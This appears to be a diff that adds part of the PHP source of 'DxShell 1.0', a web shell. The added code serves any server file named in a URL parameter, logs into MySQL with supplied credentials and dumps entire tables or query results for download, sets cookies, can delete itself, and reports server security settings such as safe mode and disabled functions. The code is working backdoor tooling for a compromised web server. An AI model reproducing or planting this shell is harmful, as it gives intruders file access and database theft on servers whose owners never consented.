+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	header('Expires: '.Date('r', time()+60*60*24*300));
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<http://leet.phpnet.us/sh.gif>
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
